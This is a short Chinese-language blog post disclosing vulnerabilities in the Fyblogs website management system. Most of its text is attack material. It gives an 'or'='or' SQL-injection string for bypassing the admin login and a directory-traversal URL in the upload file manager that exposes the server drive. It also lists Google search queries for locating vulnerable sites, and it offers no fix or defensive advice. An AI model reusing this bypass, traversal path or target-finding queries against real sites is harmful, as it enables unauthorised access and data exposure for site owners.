Fyblogs网站管理系统漏洞

后台万能密码 ‘or’=’or’
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
admin/uploadfile.asp?currentFolder=/upfiles/../

漏洞证明:

谷歌:inurl:type.asp?id=1 新闻中心
或者 :inurl:download_ok.asp?

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录